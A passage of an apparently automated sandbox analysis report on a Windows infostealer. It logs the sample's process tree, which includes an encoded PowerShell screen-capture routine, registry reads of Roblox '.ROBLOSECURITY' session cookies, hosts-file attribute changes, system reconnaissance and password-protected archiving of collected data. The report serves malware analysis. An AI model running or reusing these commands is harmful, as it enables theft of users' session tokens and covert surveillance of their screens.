AuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	13:37:04
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	13:37:04
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	13:37:04
Start date:	05/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:	0x7ff76f8a0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	13:37:04
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	13:37:06
Start date:	05/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"
Imagebase:	0x7ff780b60000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	13:37:06
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7272, Parent PID: 7388

General

Target ID:	82
Start time:	13:37:06
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	13:37:06
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	13:37:06
Start date:	05/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff786950000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	13:37:06
Start date:	05/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1CC2.tmp" "c:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP"
Imagebase:	0x7ff7ed980000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	13:37:07
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	13:37:07
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	13:37:07
Start date:	05/12/2024
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff715e50000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	13:37:08
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	13:37:08
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3904, Parent PID: 7452

General

Target ID:	91
Start time:	13:37:08
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	13:37:08
Start date:	05/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff786950000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	13:37:08
Start date:	05/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff6e7290000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	13:37:09
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2336, Parent PID: 7948

General

Target ID:	95
Start time:	13:37:09
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	13:37:09
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	13:37:09
Start date:	05/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff786950000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	13:37:09
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	13:37:09
Start date:	05/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff6e7290000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	13:37:10
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 8124, Parent PID: 280

General

Target ID:	101
Start time:	13:37:10
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3052, Parent PID: 8148

General

Target ID:	102
Start time:	13:37:10
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	13:37:10
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	13:37:10
Start date:	05/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff786950000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	13:37:11
Start date:	05/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff79c5e0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	13:37:11
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	13:37:11
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	13:37:11
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	13:37:11
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7912, Parent PID: 7392

General

Target ID:	110
Start time:	13:37:11
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	111
Start time:	13:37:11
Start date:	05/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff786950000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	112
Start time:	13:37:12
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	113
Start time:	13:37:13
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	114
Start time:	13:37:13
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	115
Start time:	13:37:15
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	116
Start time:	13:37:15
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	141
Start time:	13:37:17
Start date:	05/12/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	34

Executed Functions

Function 0040A756 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02390000,00000000,?,?), ref: 0040E2C7

